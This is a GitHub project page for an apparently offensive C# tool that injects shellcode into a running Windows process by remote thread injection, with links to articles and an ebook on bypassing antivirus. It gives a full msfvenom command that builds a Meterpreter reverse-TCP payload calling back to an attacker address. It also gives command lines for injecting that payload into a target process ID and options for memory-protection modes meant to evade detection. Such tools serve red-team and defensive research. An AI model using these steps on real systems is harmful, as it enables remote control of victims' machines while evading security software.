Project author: DamonMohammadbagher

Project description:
Remote Thread Injection by C# Delegate
Language: C#
Project URL: git://github.com/DamonMohammadbagher/NativePayload_TId.git
Created: 2021-02-21T15:04:11Z
Project community: https://github.com/DamonMohammadbagher/NativePayload_TId

License:


NativePayload_TId

Remote Thread Injection by C# Delegate


Related Links for “Mitre ATT&CK”:

Process Injection: Portable Executable Injection ==> https://attack.mitre.org/techniques/T1055/002/

Process Injection: Dynamic-link Library Injection ==> https://attack.mitre.org/techniques/T1055/001/


Your payload should be an msfvenom payload:

msfvenom --platform windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=w.x.y.z -f c > payload.txt

  1. Code1: NativePayload_TId.exe [TPID] [PAYLOAD]
  2. Code2: NativePayload_TIdnt.exe [TPID] [PAYLOAD]
  3. EXAMPLE: NativePayload_TId.exe 2452 "FC,48,83,00,..."
  4. EXAMPLE: NativePayload_TIdnt.exe 2452 "FC,48,83,00,..."

Article [1]: https://damonmohammadbagher.github.io/Posts/11Feb2021x.html

Article [2]: https://www.linkedin.com/pulse/bypassing-anti-virus-creating-remote-thread-target-mohammadbagher

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part2)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part2.pdf


online eBook, (chapters): https://damonmohammadbagher.github.io/Posts/ebookBypassingAVsByCsharpProgramming/



  1. Code1 step1: NativePayload_TId2.exe [TPID] [PAYLOAD]
  2. Code2 step2: NativePayload_TId3.exe [TPID] [VAx-addr or VirtualAllocEx Address from step1]
  3. EXAMPLE: NativePayload_TId2.exe 2452 "FC,48,83,00,..."
  4. EXAMPLE: NativePayload_TId3.exe 2452 1bfc0190000

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf


  1. NativePayload_TImd.exe [steps 1 or 2] [delay 2000] [MemoryProtection/mode 0 or 1] [TPID 4716] [payload fc,48,..]
  2. example: NativePayload_TImd.exe 1 2000 0 4716 fc,48,56,...
  3. example: NativePayload_TImd.exe 2 6721 1 4716 fc,48,56,...
  4. step = 1: you will have 4 steps (default)
  5. step = 2: you will have 28 steps
  6. MemoryProtection = 0: API::VirtualAllocEx is set to MemoryProtection.ExecuteReadWrite
  7. MemoryProtection = 1: API::VirtualAllocEx is set to MemoryProtection.Execute

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf